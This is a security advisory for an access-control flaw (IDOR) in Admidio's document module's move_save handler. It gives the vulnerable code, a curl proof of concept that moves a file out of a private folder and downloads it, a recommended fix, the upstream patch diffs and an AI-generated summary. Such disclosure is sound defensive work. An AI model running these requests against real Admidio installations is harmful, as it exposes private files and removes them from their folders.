Admidio has IDOR in `documents-files.php` `mode=move_save` that lets any folder-uploader exfiltrate files from private folders
Description
Summary
modules/documents-files.php gates state-changing modes by checking that the actor has hasUploadRight() on the URL parameter folder_uuid. The move_save handler then operates on a *separate* URL parameter file_uuid and calls File::moveToFolder($destFolderUUID). File::moveToFolder() checks the upload right on the destination folder but never on the source folder containing the file. As a result, any user who can upload to any single folder can move any file from any other folder — including private folders to which they have no view rights — into a folder they control, and then download it. Confidentiality is broken (private file contents leak) and integrity is broken (the file is removed from the original location).
Details
Vulnerable
Code
modules/documents-files.php:79-89 — top-level rights check binds to URL folder_uuid:
if ($getMode != 'list' && $getMode != 'download') {
// check the rights of the current folder
// user must be administrator or must have the right to upload files
$folder = new Folder($gDb);
$folder->getFolderForDownload($getFolderUUID);
if (!$folder->hasUploadRight()) {
$gMessage->show($gL10n->get('SYS_NO_RIGHTS'));
// => EXIT
}
}
modules/documents-files.php:187-204 — the move_save branch loads the file by UUID without revalidating the file's actual parent folder:
case 'move_save':
$documentsFilesMoveForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);
$formValues = $documentsFilesMoveForm->validate($_POST);
if ($getFileUUID !== '') {
$file = new File($gDb);
$file->readDataByUuid($getFileUUID); // <-- no permission check on the file's source folder
$file->moveToFolder($formValues['adm_destination_folder_uuid']);
} else {
$folder = new Folder($gDb);
$folder->readDataByUuid($getFolderUUID);
$folder->moveToFolder($formValues['adm_destination_folder_uuid']);
}
$gNavigation->deleteLastUrl();
echo json_encode(array('status' => 'success', 'url' => $gNavigation->getUrl()));
break;
src/Documents/Entity/File.php:212-223 — moveToFolder checks only the destination:
public function moveToFolder(string $destFolderUUID)
{
$folder = new Folder($this->db);
$folder->readDataByUuid($destFolderUUID);
if ($folder->hasUploadRight()) { // <-- destination only
FileSystemUtils::moveFile($this->getFullFilePath(),
$folder->getFullFolderPath() . '/' . $this->getValue('fil_name'));
$this->setValue('fil_fol_id', $folder->getValue('fol_id'));
$this->save();
}
}
There is no check that the actor has any right (view, edit, upload) on the folder that *currently* contains the file. The file_uuid URL parameter is independent of folder_uuid, so an attacker can pass folder_uuid= together with file_uuid=. The top-level rights check passes; the destination check passes; the file is moved.
Exploitation
Primitive
1. Attacker user lowuser holds folder_upload on a single Documents folder public_uploadable (UUID c41a99c0-…). They have no view or edit rights on private_admin_only (UUID db1f71b9-…, which is a role-restricted folder containing private_to_delete.txt, UUID 559ed352-…). 2. Render the move form with mismatched UUIDs to register a form key in the session: GET /modules/documents-files.php?mode=move&folder_uuid=c41a99c0-…&file_uuid=559ed352-… 3. Submit move_save with the same mismatch: POST /modules/documents-files.php?mode=move_save&folder_uuid=c41a99c0-…&file_uuid=559ed352-… with adm_csrf_token= and adm_destination_folder_uuid=c41a99c0-…. Server replies {"status":"success"}. The private_to_delete.txt row in adm_files now has fil_fol_id pointing at the public-uploadable folder. 4. Download the file from its new (publicly-accessible) location: GET /modules/documents-files.php?mode=download&file_uuid=559ed352-… returns the bytes of private_to_delete.txt.
PoC
Tested live on HEAD c5cde53. The trace below is the agent-captured run; I verified the code paths against the source listed above.
# 0. starting state — lowuser has upload right ONLY on c41a99c0-… (public_uploadable)
$ curl -sb $cookie http://127.0.0.1:8085/modules/documents-files.php?folder_uuid=db1f71b9-…
"You do not have the required permission to perform this action."
# 1. render the move form using the public folder UUID (where lowuser has upload right)
# paired with the PRIVATE file UUID
$ curl -sb $cookie \
"http://127.0.0.1:8085/modules/documents-files.php?mode=move&folder_uuid=c41a99c0-…&file_uuid=559ed352-…"
# form rendered, CSRF token X is now in session
# 2. submit move_save with the same param mismatch
$ curl -sb $cookie -X POST \
"http://127.0.0.1:8085/modules/documents-files.php?mode=move_save&folder_uuid=c41a99c0-…&file_uuid=559ed352-…" \
-d "adm_csrf_token=X&adm_destination_folder_uuid=c41a99c0-…"
{"status":"success", "url":"…"}
# 3. download the leaked file
$ curl -sb $cookie \
"http://127.0.0.1:8085/modules/documents-files.php?mode=download&file_uuid=559ed352-…"
private_to_delete_data
The DB record for the file now points at the attacker's folder (fil_fol_id updated), and the file has been physically moved on disk by FileSystemUtils::moveFile.
Impact
Any user with folder_upload right on a single Documents folder gains:
- Read access to every file in private folders — admin-only documents, board-only files, leader-only resources, role-restricted attachments — by moving them into a folder the attacker owns and then downloading.
- Write/destruction primitive — the file is no longer in its original folder. Users who depended on the file at its legitimate location can no longer find it. The moved file's permissions are now those of the destination, so previously-restricted content can be exposed to other low-privilege users (whoever else has view rights on the destination folder).
In multi-tenant Admidio installations where one shared deployment hosts multiple groups (e.g., a federation of associations), the bug crosses organisation-internal Documents trust boundaries: a member of group A holding folder_upload on group A's public folder can lift any private file from group B.
PR:L reflects that the actor must hold a single Documents upload right (a routinely-granted role attribute, not an administrator privilege). S:U because the impact stays inside the Documents module's own access-control model, but the access boundary it bypasses is the one that operators most rely on. C:H because confidentiality of any file in any private folder is broken; I:H because file location is mutated.
Recommended
Fix
File::moveToFolder() must check that the actor has upload right (or at least edit / move right) on the file's *source* folder, not just on the destination. The minimal patch:
// src/Documents/Entity/File.php
public function moveToFolder(string $destFolderUUID)
{
// re-read the source folder this file currently lives in, and check rights on it
$sourceFolder = new Folder($this->db);
$sourceFolder->readData($this->getValue('fil_fol_id'));
if (!$sourceFolder->hasUploadRight()) {
throw new Exception('SYS_NO_RIGHTS');
}
$destFolder = new Folder($this->db);
$destFolder->readDataByUuid($destFolderUUID);
if (!$destFolder->hasUploadRight()) {
throw new Exception('SYS_NO_RIGHTS');
}
FileSystemUtils::moveFile($this->getFullFilePath(),
$destFolder->getFullFolderPath() . '/' . $this->getValue('fil_name'));
$this->setValue('fil_fol_id', $destFolder->getValue('fol_id'));
$this->save();
}
Equivalently, documents-files.php case 'move_save' should resolve the file's actual parent folder before the operation and call getFileForDownload() plus hasUploadRight() on that parent. The same fix is needed for Folder::moveToFolder() (the move-folder path is identical in shape).
A regression test should: 1. Create user lowuser with upload right only on folder A. 2. Place a private file in folder B with no rights for lowuser. 3. As lowuser, render mode=move with folder_uuid=A&file_uuid=<B's file>, then POST mode=move_save with the same. 4. Assert the response is SYS_NO_RIGHTS and the file's fil_fol_id is unchanged.
Related
mode=file_rename_save shares the same root cause and is filed separately (06-documents-cross-folder-rename-idor.md); both bugs flow from the top-level rights check binding to URL folder_uuid rather than the file's actual parent.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
In Admidio, the move_save handler in documents-files.php fails to verify source folder permissions, allowing any upload-capable user to move and exfiltrate files from any folder.
Vulnerability
In Admidio's documents-files.php, the move_save handler (line 187) retrieves a file by UUID via File::readDataByUuid($getFileUUID) without verifying that the authenticated user has any permission on the file's source folder. The top-level rights check (lines 79-89) only validates hasUploadRight() on the folder_uuid URL parameter, which is the folder the user is currently browsing, not the file's actual parent. Consequently, any user who can upload to at least one folder can supply a file_uuid from any other folder and move it to a destination they control. The vulnerability is present in all versions of Admidio containing this code; no specific version range is provided in the available references [1][2].
Exploitation
An attacker needs a valid account with upload rights to any folder in the Admidio documents module. The attacker crafts a POST request to documents-files.php with mode=move_save, a folder_uuid parameter pointing to a folder where they have upload rights (to pass the initial check), and a file_uuid parameter pointing to a target file in a private or restricted folder. The adm_destination_folder_uuid is set to the attacker's controlled folder. The server moves the file without checking source folder permissions, and the attacker can then download the file from their folder [1][2].
Impact
Successful exploitation breaks confidentiality: the attacker gains access to the contents of any file in any folder, including private folders they cannot normally view. Integrity is also compromised because the file is removed from its original location, potentially causing data loss or disruption. The attacker does not need administrative privileges; only the ability to upload to any single folder is required [1][2].
Mitigation
No fixed version is disclosed in the available references. The vendor (Admidio) should release a patch that adds a source folder permission check in the move_save handler. Until a patch is applied, administrators can restrict upload rights to trusted users only, or disable the move functionality if not needed. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog as of the publication date [1][2].
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
259a08a5f4587Folder rights not checked when working with files #2035
2 files changed · +9 −8
modules/documents-files.php+7 −5 modified@@ -62,11 +62,7 @@ 'download') ) ); - $getFolderUUID = admFuncVariableIsValid($_GET, 'folder_uuid', 'uuid', - array( - 'requireValue' => !in_array($getMode, array('list', 'file_delete', 'download')) - ) - ); + $getFolderUUID = admFuncVariableIsValid($_GET, 'folder_uuid', 'uuid'); $getFileUUID = admFuncVariableIsValid($_GET, 'file_uuid', 'uuid'); // Check if the module is activated @@ -77,6 +73,12 @@ } if ($getMode != 'list' && $getMode != 'download') { + if ($getFileUUID !== '') { + // when file UUID is set then read the folder of that file from database and check the rights + $file = new File($gDb); + $file->readDataByUuid($getFileUUID); + $getFolderUUID = $file->getValue('fol_uuid'); + } // check the rights of the current folder // user must be administrator or must have the right to upload files $folder = new Folder($gDb);
src/UI/Presenter/DocumentsPresenter.php+2 −3 modified@@ -92,7 +92,7 @@ public function createFileRenameForm(string $fileUUID): void $form = new FormPresenter( 'adm_documents_file_rename_form', 'modules/documents-files.rename.tpl', - SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'file_rename_save', 'folder_uuid' => $this->folderUUID, 'file_uuid' => $fileUUID)), + SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'file_rename_save', 'file_uuid' => $fileUUID)), $this ); $form->addInput( @@ -592,14 +592,13 @@ public function createList(): void 'url' => SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array( 'mode' => 'file_rename', - 'folder_uuid' => $this->folder->getValue('fol_uuid'), 'file_uuid' => $row['uuid'] )), 'icon' => 'bi bi-pencil-square', 'tooltip' => $gL10n->get('SYS_EDIT') ); $templateRow['actions'][] = array( - 'url' => SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'move', 'folder_uuid' => $this->folder->getValue('fol_uuid'), 'file_uuid' => $row['uuid'])), + 'url' => SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'move', 'file_uuid' => $row['uuid'])), 'icon' => 'bi bi-folder-symlink', 'tooltip' => $gL10n->get('SYS_MOVE_FILE') );
f80e1d12e0f8Fix rights check for category editing #2039
1 file changed · +32 −13
modules/categories.php+32 −13 modified@@ -41,23 +41,42 @@ $getType = admFuncVariableIsValid($_GET, 'type', 'string', array('validValues' => array('ANN', 'AWA', 'EVT', 'FOT', 'LNK', 'ROL', 'USF', 'IVT'))); $getCategoryUUID = admFuncVariableIsValid($_GET, 'uuid', 'uuid'); - // check rights of the type - if (($getType === 'ANN' && !$gCurrentUser->isAdministratorAnnouncements()) - || ($getType === 'AWA' && !$gCurrentUser->isAdministratorUsers()) - || ($getType === 'EVT' && !$gCurrentUser->isAdministratorEvents()) - || ($getType === 'FOT' && !$gCurrentUser->isAdministratorForum()) - || ($getType === 'LNK' && !$gCurrentUser->isAdministratorWeblinks()) - || ($getType === 'ROL' && !$gCurrentUser->isAdministratorRoles()) - || ($getType === 'USF' && !$gCurrentUser->isAdministratorUsers()) - || ($getType === 'IVT' && !$gCurrentUser->isAdministratorInventory())) { - throw new Exception('SYS_NO_RIGHTS'); - } + if (in_array($getMode, array('edit', 'save', 'delete', 'sequence'), true) && $getCategoryUUID !== '') { + $category = new Category($gDb); + $category->readDataByUuid($getCategoryUUID); + + if ($category->isNewRecord()) { + throw new Exception('SYS_INVALID_PAGE_VIEW'); + } + + // re-check rights against the *record's* cat_type, not the user-supplied type + $recordType = $category->getValue('cat_type'); + if ( ($recordType === 'ANN' && !$gCurrentUser->isAdministratorAnnouncements()) + || ($recordType === 'AWA' && !$gCurrentUser->isAdministratorUsers()) + || ($recordType === 'EVT' && !$gCurrentUser->isAdministratorEvents()) + || ($recordType === 'FOT' && !$gCurrentUser->isAdministratorForum()) + || ($recordType === 'LNK' && !$gCurrentUser->isAdministratorWeblinks()) + || ($recordType === 'ROL' && !$gCurrentUser->isAdministratorRoles()) + || ($recordType === 'USF' && !$gCurrentUser->isAdministratorUsers()) + || ($recordType === 'IVT' && !$gCurrentUser->isAdministratorInventory())) { + throw new Exception('SYS_NO_RIGHTS'); + } - if (in_array($getType, array('edit', 'save', 'delete'))) { - // check if this category is editable by the current user and current organization if (!$category->isEditable()) { throw new Exception('SYS_NO_RIGHTS'); } + } else { + // check rights of the type + if (($getType === 'ANN' && !$gCurrentUser->isAdministratorAnnouncements()) + || ($getType === 'AWA' && !$gCurrentUser->isAdministratorUsers()) + || ($getType === 'EVT' && !$gCurrentUser->isAdministratorEvents()) + || ($getType === 'FOT' && !$gCurrentUser->isAdministratorForum()) + || ($getType === 'LNK' && !$gCurrentUser->isAdministratorWeblinks()) + || ($getType === 'ROL' && !$gCurrentUser->isAdministratorRoles()) + || ($getType === 'USF' && !$gCurrentUser->isAdministratorUsers()) + || ($getType === 'IVT' && !$gCurrentUser->isAdministratorInventory())) { + throw new Exception('SYS_NO_RIGHTS'); + } } switch ($getMode) {
Vulnerability mechanics
Root cause
"The top-level rights check in `modules/documents-files.php` validates the user-supplied `folder_uuid` parameter instead of the file's actual parent folder, and `File::moveToFolder()` never checks upload rights on the source folder."
Attack vector
An attacker who has upload rights on any single Documents folder can move a file from any other folder (including private ones) into their own folder and then download it. The attacker supplies a `folder_uuid` for a folder they can upload to together with a `file_uuid` for a file in a private folder they cannot access. The top-level rights check passes because it only validates the `folder_uuid` parameter, and `File::moveToFolder()` only checks the destination folder. The file is then physically moved and its database record updated, allowing the attacker to download the formerly private file from the now-public location. [ref_id=1] [ref_id=2]
Affected code
The vulnerability is in `modules/documents-files.php` and `src/Documents/Entity/File.php`. The top-level rights check at line 79-89 binds to the URL parameter `folder_uuid` rather than the file's actual parent folder. The `move_save` handler (line 187-204) loads the file by `file_uuid` without revalidating its source folder, and `File::moveToFolder()` (line 212-223) only checks upload rights on the destination folder, never on the source folder.
What the fix does
Patch `[patch_id=3130371]` changes the top-level rights check in `modules/documents-files.php` so that when a `file_uuid` is present, the code reads that file's folder from the database and uses that folder UUID for the permission check instead of the user-supplied `folder_uuid` parameter. This ensures the actor must have upload rights on the file's actual source folder, not just on an arbitrary folder they control. The patch also removes `folder_uuid` from the URLs generated by `DocumentsPresenter.php` for move and rename actions, preventing legitimate users from accidentally omitting the parameter.
Preconditions
- authThe attacker must have upload rights (hasUploadRight()) on at least one Documents folder.
- inputThe attacker must know or guess the UUID of a file in a private folder they should not access.
- networkThe attacker must be able to send crafted HTTP GET and POST requests to the Admidio server.
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.